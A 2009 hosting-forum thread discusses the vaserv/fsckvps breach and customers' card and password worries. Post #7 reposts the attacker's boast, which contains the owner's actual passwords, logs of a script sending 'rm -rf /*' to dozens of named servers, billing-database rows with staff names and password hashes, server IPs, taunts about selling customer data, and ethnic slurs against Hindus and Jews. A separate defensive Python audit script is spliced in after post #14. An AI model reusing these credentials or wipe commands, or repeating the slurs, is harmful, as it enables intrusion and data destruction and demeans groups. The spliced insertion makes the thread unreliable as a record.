-
06-09-2009, 08:16 AM #1 New Member
- Join Date
- Jun 2009
- Posts
- 1
vaserv/fsckvps client base compromised?
I know that hacker claimed that he got the vaserv/fsckvps client database? Should we cancel our credit cards? This is a major issue and someone should be held responsible!
-
06-09-2009, 08:21 AM #2 Junior Guru Wannabe
- Join Date
- Aug 2007
- Posts
- 97
I changed my PayPal password (all I've ever used with them.)
-
06-09-2009, 09:36 AM #3 Newbie
- Join Date
- Jun 2009
- Posts
- 5
-
06-09-2009, 11:42 AM #4 Web Hosting Master
- Join Date
- Mar 2009
- Location
- Minnesota
- Posts
- 700
If fsck vps was PCI compliant, they shouldn't have gotten any sort of CC information/paypal information.
█ madgenius.com - S Corp. We are US based company.
█ Web Hosting, Cloud VPS, and Dedicated Solutions since 1998
█ Also offering custom solutions and automated provisioning for most services
-
06-09-2009, 11:47 AM #5 Junior Guru Wannabe
- Join Date
- Apr 2009
- Posts
- 60
-
06-09-2009, 11:52 AM #6 Web Hosting Master
- Join Date
- Oct 2007
- Location
- United States
- Posts
- 1,182
If he got the database and then the config file (WHMCS config which contains the hash key) from the web server, then that means he has the encryption key to view the credit cards. This of course is an assumption that they are using WHMCS.
Before you make such claims that their WHMCS was compromised, you should make sure to know the facts first.
www.opticip.com - Optic IP LLC
-
06-09-2009, 12:03 PM #7 Virtually Flawless ;)
- Join Date
- Apr 2009
- Location
- USA / UK
- Posts
- 4,577
It looks like a transcript of the hacker's message is here:
http://www.tjphippen.com/hackerpost.txt
Edit: the hacker's message is gone now, so here's the full text:
Code:
Z3r0 day in hypervm?? plz u give us too much credit. If you really really wanna know how you got wtfpwned bitch it was ur own stupidity and excessive passwd reuse. Rus's passwds are

Code:
e2x2%sin0ei
unf1shf4rt
3^%3df
1/2=%mod5
f0ster

f0ster being the latest one, quite secure eh bitches? We were in ur networks sniffing ur passwds for the past two months quite funny this openvz crap is we could just get into any VPS we like at any time thanks to ur mad passwds. But we got bored so we decided to initiate operation rmfication and hypervm was a great t00l to do that since it spared us the time of sshing into all ur 200 boxen just to issue rm -rf. Coded a little .pl to do just that, take a look at this eleet output it's mad dawg

Code:
[root@vz-vaserv .ssh]# perl h.pl -user admin -pass ****off -host cp.vaserv.com -cmd 'rm -rf /* 2> /dev/null > /dev/null &'
[+] Attempting to login using admin / ****off
[+] Logged in, showtime!
Output for 67.222.156.106
Output for xen3ws.vaserv.com
Output for vz22uk.vaserv.com
Output for xen4ws.vaserv.com
Output for vzspecial5.vaserv.com
Output for xen16.vaserv.com
Output for vz77uk.vaserv.com
Output for 91.186.26.128
Output for xen25.vaserv.com
Output for vz76uk.vaserv.com
Output for vz18tx.vaserv.com
Output for vz75uk.vaserv.com
Output for vz45uk.vaserv.com
Output for vzpent16.vaserv.com
Output for xen1tx.vaserv.com
Output for vz13tx.vaserv.com
Output for vz74uk.vaserv.com
Output for vzspecial8.vaserv.com
Output for xen24.vaserv.com
Output for vz73uk.vaserv.com
Output for rdns1.vaserv.com
Output for vz2tx.vaserv.com
Output for vz17tx.vaserv.com
Output for xen23.vaserv.com
Output for vz72uk.vaserv.com
Output for xen22.vaserv.com
Output for vzruffbuff.vaserv.com
Output for vzmario.vaserv.com
Output for xen21.vaserv.com
Output for vz71uk.vaserv.com
Output for vzspecial7.vaserv.com
Output for vz70uk.vaserv.com
Output for xen20.vaserv.com
Output for vz69uk.vaserv.com
Output for vzspecial6.vaserv.com
Output for vz7uk.vaserv.com
Output for vzspecial4.vaserv.com
Output for vzspecial3.vaserv.com
Output for xen19.vaserv.com
Output for vzspecial2.vaserv.com
Output for vzspecial1.vaserv.com
Output for vzpent3.vaserv.com
output truncated due to massive boxen outputz
[root@vz-vaserv .ssh]# rm -rf /* > /dev/null 2> /dev/null &
[1] 12399
[root@vz-vaserv .ssh]#

Did the same fo ****vps.com after resetting the passwd to hyper ve emz, it was ever so much fun you should try it sometime Rus it's GREAT! BTW to all the customers we deleted ur loving provider is overselling their crappy 8gb nodez to hell and back, thought you'd like to know, you can also thank ur loving buddy Rus for losing ur data hihi. BTW Rus we still have ur billing system wtfpwned and baqdoored we got shitload of CCz from ur retarded customers thanks a lot buddy. Telling you this cuz we got bored of this ****, it's just too easy and monotonous so patch ur crap, if your too dumb to secure a simple web server my rate is $100/hour or one night with ur sister hauhaiahiaha. Also wheres ur team Rus? the only ****ers i saw in ur billing sys are Kody, Vlada and u you guys work like ****ing hindus i bet but ur cheap like jews lolz hire some pros like me to help you out manage all those retards VPSs lolololl

Code:
1 1 rghf c32f3310baffcb431875a67196e99ebd Rus F zswlxxoomx@nowmymail.com 0 , Edit Delete
3 1 vlada c32f3310baffcb431875a67196e99ebd Vlada Neskovic zswlxxoomx@nowmymail.com 0 , Edit Delete
4 1 Kody fde67637d867c52d739931528dd92ef0 Kody Riker zswlxxoomx@nowmymail.com Georgia - server22 space 1slot 1gb 0 ,

See we care about ur privacy and edited ur emailz unlike you who do not care about the privacy of ur retarded customers lol

Code:
Showing rows 0 - 29 (1,361 total, Query took 0.0133 sec)
SELECT * FROM `tblclients` LIMIT 0 , 30

Fun stuff think we gonna sell all those emails to some spammers to make some quick bucks lol, and yes their main site was a VPS lolol which is why we got quick access thanks to ur passwd reuse, your awesome Rus.

Yea yea "his IP is:64.79.210.78" here i saved u the trouble lolol

Code:
-bash-3.2# ifconfig
lo        Link encap:Local Loopback
          inet addr:127.0.0.1 Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING MTU:16436 Metric:1
          RX packets:16271 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16271 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:1114930 (1.0 MiB) TX bytes:1114930 (1.0 MiB)
venet0    Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
          inet addr:127.0.0.1 P-t-P:127.0.0.1 Bcast:0.0.0.0 Mask:255.255.255.255
          UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
          RX packets:33396 errors:0 dropped:0 overruns:0 frame:0
          TX packets:34122 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:4462516 (4.2 MiB) TX bytes:11170841 (10.6 MiB)
venet0:0  Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
          inet addr:64.79.210.78 P-t-P:64.79.210.78 Bcast:64.79.210.78 Mask:255.255.255.255
          UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
venet0:1  Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
          inet addr:64.79.206.197 P-t-P:64.79.206.197 Bcast:64.79.206.197 Mask:255.255.255.255
          UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
venet0:2  Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
          inet addr:67.223.225.52 P-t-P:67.223.225.52 Bcast:67.223.225.52 Mask:255.255.255.255
          UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1
-bash-3.2# rm -rf /* 2> /dev/null > /dev/null * &
[1] 7643
-bash-3.2#

I love to rm lol bye ~Thedefaced.org
→ RAM Host -- USA Premium & Budget Linux Hosting
█ Featuring Powerful cPanel Shared Hosting
█ & Premium Virtual Dedicated Servers
→ Follow us on Twitter
-
06-09-2009, 12:04 PM #8 WHT Addict
- Join Date
- Jun 2006
- Posts
- 148
They can't have got your PayPal password because as with all companies, vaserv direct you to paypal.com to log in - the password is never stored anywhere other than PayPal and anyone that enters their PayPal login info anywhere other than paypal.com is stupid.
-
06-09-2009, 12:05 PM #9 Mr. Awesome
- Join Date
- Jul 2002
- Posts
- 6,347
Their cheapvps.co.uk brand is using Ubersmith.
If their database was compromised, I suspect Rus will let us know asap. He has been very open and honest about everything so far, so I have confidence he will let us know if their database of credit card details was stolen.
That being said... it is always a good idea to periodically change your passwords, so now might be as good a time as any.
Also maybe give your credit card company a call and ask them to temporarily suspend the card for a few days until Rus has a chance to confirm if their database was stolen or not. It can't hurt to be overly cautious, but I would not actually cancel your card just yet.
We are eNom PLATINUM PLUS resellers!
Sign up today for an eNom.com reseller account with lowest possible pricing.
* We provide support and service to over 4275 happy eNom domain name and SSL certificate resellers!
-
06-09-2009, 12:10 PM #10 Web Hosting Master
- Join Date
- Oct 2007
- Location
- United States
- Posts
- 1,182
Fun stuff think we gonna sell all those emails to some spammers to make some quick bucks lol, and yes their main site was a VPS lolol which is why we got quick access thanks to ur passwd reuse, your awesome Rus.
www.opticip.com - Optic IP LLC
-
06-09-2009, 12:17 PM #11 Newbie
- Join Date
- Aug 2006
- Posts
- 7
Can we stop talking about this here... this thread is surely about people getting sorted out.
Not discussing what _could_ be complete BS from someone trying to look good by posting some code up.
Last edited by anon-e-mouse; 06-14-2009 at 05:24 PM. Reason: removed size tags
-
06-09-2009, 12:25 PM #12 New Member
- Join Date
- Jun 2009
- Location
- Austria
- Posts
- 2
Maybe it's BS, maybe not.
But if it's true, credit card users are in danger of misuse.
If it's true that "BTW Rus we still have ur billing system wtfpwned and baqdoored" then future use of this system isn't really recommendable.
-
06-09-2009, 12:25 PM #13 Virtually Flawless ;)
- Join Date
- Apr 2009
- Location
- USA / UK
- Posts
- 4,577
(sized reduced)
This is a discussion - I ripped that from the source as described, which I acquired while listening to an IRC channel.
And I have a bigger reputation than you and have no reason to argue with someone who only has 7 posts - I suspect a mod will be round to take care of you soon.
Besides, you can find the same text here in the really big thread.
It also exists here
This forum exists to discuss things, and when new information arises you shouldn't be so quick to jump to conclusions.
I've been breaking news all night.
Take it easy - nobody is after you personally.
Last edited by ramnet; 06-09-2009 at 12:32 PM.
-
06-09-2009, 01:05 PM #14 Web Hosting Master
- Join Date
- Oct 2008
- Posts
- 2,253
I think it may be BS, but if his password was actually f0ster after his last name, that's just stupid.
And we are all fully aware they oversell, but as long as I still get quality I don't care.
Leader of the new anti sig spamming club.
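An added example, not part of any post in this thread and not code from either provider: the dump quoted in post #7 lists two staff rows carrying the same 32-character hex digest, and post #14 remarks on a password based on the owner's last name. The sketch below shows how a defender could audit their own staff table for both conditions; the table layout, the sample rows, the name "Jordan Foster" and the treatment of any 32-hex value as an unsalted digest are assumptions made for illustration.

```python
import hashlib
import re
from collections import defaultdict

# Substitutions undone before comparing a password with its owner's name.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})

def derived_from_name(password, full_name, min_len=4):
    """Set-time policy check: does the de-leeted password contain a name part?"""
    plain = password.lower().translate(LEET)
    parts = [p for p in re.split(r"[^a-z]+", full_name.lower()) if len(p) >= min_len]
    return any(p in plain for p in parts)

def hash_scheme(stored):
    """Classify a stored credential by its format alone."""
    if re.fullmatch(r"[0-9a-fA-F]{32}", stored):
        return "unsalted-32hex"   # assumption: equal passwords give equal rows
    if re.match(r"\$2[aby]\$\d\d\$", stored):
        return "bcrypt"
    return "unknown"

def audit_staff_table(rows):
    """rows: (username, stored_hash) pairs. Returns a sorted list of findings."""
    by_hash = defaultdict(list)
    findings = []
    for user, stored in rows:
        by_hash[stored].append(user)
        if hash_scheme(stored) == "unsalted-32hex":
            findings.append(("weak-scheme", (user,)))
    for users in by_hash.values():
        if len(users) > 1:
            findings.append(("shared-password", tuple(sorted(users))))
    return sorted(findings)

# Constructed sample table: two accounts share one password, one is bcrypt-format.
_shared = hashlib.md5(b"constructed-sample-password").hexdigest()
STAFF = [("owner", _shared), ("support", _shared), ("billing", "$2b$12$" + "x" * 53)]

if __name__ == "__main__":
    for finding in audit_staff_table(STAFF):
        print(finding)
    print(derived_from_name("f0ster", "Jordan Foster"))  # constructed name
```

A shared digest only becomes visible because the scheme is unsalted; with a per-user salt, the same reuse would have to be caught by a policy check when the password is set.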
-
06-09-2009, 01:10 PM #15 WHT Addict
- Join Date
- Mar 2006
- Posts
- 134
-
06-09-2009, 01:12 PM #16 Web Hosting Master
- Join Date
- Jan 2004
- Location
- South East U.K.
- Posts
- 1,303
Just got this from FSCKVPS
Dear Clients,
As you are most aware of the recent incidents, we are aware the hackers may have got a hand on the credit card details of your account. While this information is encrypted, and is believed to be safe, we are sending out this notification to let you know that they might have the information and that you should take proper precautions.
a). Cancel Credit cards
b). Watch Bank Statements
c). Keep updated with the status on http://fsckvps.com.
We appreciate each customer's patience and co-operation in this time. We ask that you do not respond to this email as it will bulk up our support department even more.
-
06-09-2009, 01:13 PM #17 Web Hosting Master
- Join Date
- Oct 2008
- Posts
- 2,253
-
06-09-2009, 01:15 PM #18 WHT Addict
- Join Date
- Mar 2006
- Posts
- 134
-
06-09-2009, 01:17 PM #19 Newbie
- Join Date
- Jun 2007
- Posts
- 12
If you are worried about your PayPal (used the same password or whatever) you can always set your cellphone up as a security token (they have to text you a code to allow you to log in).
Edit: I also just realized that it doesn't appear that they store your PayPal email address (check an old invoice and all it said was paid by PayPal. I know it's stored in their transaction log in PayPal but I'm not sure about on the website). So if you have a different email you use with PayPal you should also be pretty safe.
Last edited by spyfox5400; 06-09-2009 at 01:21 PM.
-
06-09-2009, 01:24 PM #20 Web Hosting Master
- Join Date
- Oct 2008
- Posts
- 2,253
-
06-09-2009, 01:28 PM #21 Web Hosting Guru
- Join Date
- Mar 2004
- Location
- /dev/null
- Posts
- 275
Yep, just received:
Dear Clients,
As you are most aware of the recent incidents, we are aware the hackers may have got a hand on the credit card details of your account. While this information is encrypted, and is believed to be safe, we are sending out this notification to let you know that they might have the information and that you should take proper precautions.
a). Cancel Credit cards
b). Watch Bank Statements
c). Keep updated with the status on http://fsckvps.com.
We appreciate each customer's patience and co-operation in this time. We ask that you do not respond to this email as it will bulk up our support department even more.
If you have any questions about this specifically, please wait 48 hours and then reply to billing@fsckvps.com
Regards,
FsckVPS Billing.
Hmm, sorry for the double post, but I forgot to refresh the page after lunch ...
-
06-09-2009, 01:32 PM #22 Web Hosting Master
- Join Date
- Oct 2008
- Posts
- 2,253
-
06-09-2009, 01:39 PM #23 Newbie
- Join Date
- Jun 2007
- Posts
- 12
-
06-09-2009, 02:06 PM #24 Web Hosting Master
- Join Date
- Nov 2001
- Location
- Vancouver
- Posts
- 2,422
Log on to https://secure.fsckvps.com/ and check "My Emails".
“Even those who arrange and design shrubberies are under
considerable economic stress at this period in history.”
-
06-09-2009, 02:09 PM #25 Newbie
- Join Date
- Jun 2007
- Posts
- 12